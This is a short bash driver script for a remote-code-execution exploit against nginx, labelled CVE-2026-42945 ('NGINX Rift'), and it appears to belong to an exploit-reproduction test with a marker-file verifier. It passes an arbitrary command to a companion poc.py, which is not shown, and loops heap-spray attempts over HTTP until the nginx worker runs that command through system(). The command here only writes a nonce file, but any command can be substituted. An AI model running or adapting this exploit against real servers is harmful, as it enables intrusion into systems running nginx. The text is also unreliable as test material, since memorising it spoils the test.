#!/usr/bin/env bash
# CVE-2026-42945 ("NGINX Rift") RCE driver.
#
# Usage: bash exploit/run.sh <nonce> [host] [port]
#
# Drives the heap-overflow RCE entirely over HTTP against the nginx listener.
# The worker's redirected pool-cleanup handler runs:
#     echo <nonce> > /app/marker/<nonce>
# i.e. system() writes a marker file under /app/marker/ containing the nonce.
#
# RCE is per-attempt probabilistic; poc.py iterates sprayed-struct address
# candidates x attempts (bounded by --max-rounds) until the worker executes
# the command. This script does NOT verify success — the verifier reads the
# marker out-of-band.
set -u

NONCE="${1:?usage: run.sh <nonce> [host] [port]}"
HOST="${2:-127.0.0.1}"
PORT="${3:-19321}"

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"

CMD="echo ${NONCE} > /app/marker/${NONCE}"

exec python3 "${SCRIPT_DIR}/poc.py" \
    --host "${HOST}" \
    --port "${PORT}" \
    --max-rounds 8 \
    --cmd "${CMD}"